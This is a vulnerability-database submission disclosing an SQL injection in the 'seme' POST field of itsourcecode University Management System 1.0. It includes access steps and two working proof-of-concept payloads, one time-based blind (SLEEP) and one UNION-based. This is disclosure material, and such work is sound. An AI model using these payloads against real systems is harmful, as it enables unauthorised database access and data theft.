| Title | itsourcecode University Management System 1.0 SQLi |
|---|
| Description | Register and log in with a student account, and in the student account's backend, visit "/view_single_result.php?vr=123321&vn=mirage," where "vr" refers to the StudentID and "vn" to the student's name. Click the "view Result" button. There is an SQL injection vulnerability in the "seme" field of the POST data packet sent.
POC:
Parameter: seme (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: seme=1st' AND (SELECT 4900 FROM (SELECT(SLEEP(5)))IWYu) AND 'sLik'='sLik
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: seme=1st' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x424b4d66785475486669785141445a6a4e4f72774d675543446e585856446d686c56674b58685a57,0x7176767871),NULL-- - |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE6-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 2024年07月18日 08:40 (12 月 ago) |
|---|
| Moderation | 2024年07月20日 16:14 (2 days later) |
|---|
| Status | 承諾済み |
|---|
| VulDB Entry | 272074 [itsourcecode University Management System 1.0 view_single_result.php?vr=123321&vn=mirage seme SQLインジェクション] |
|---|
| Points | 20 |
|---|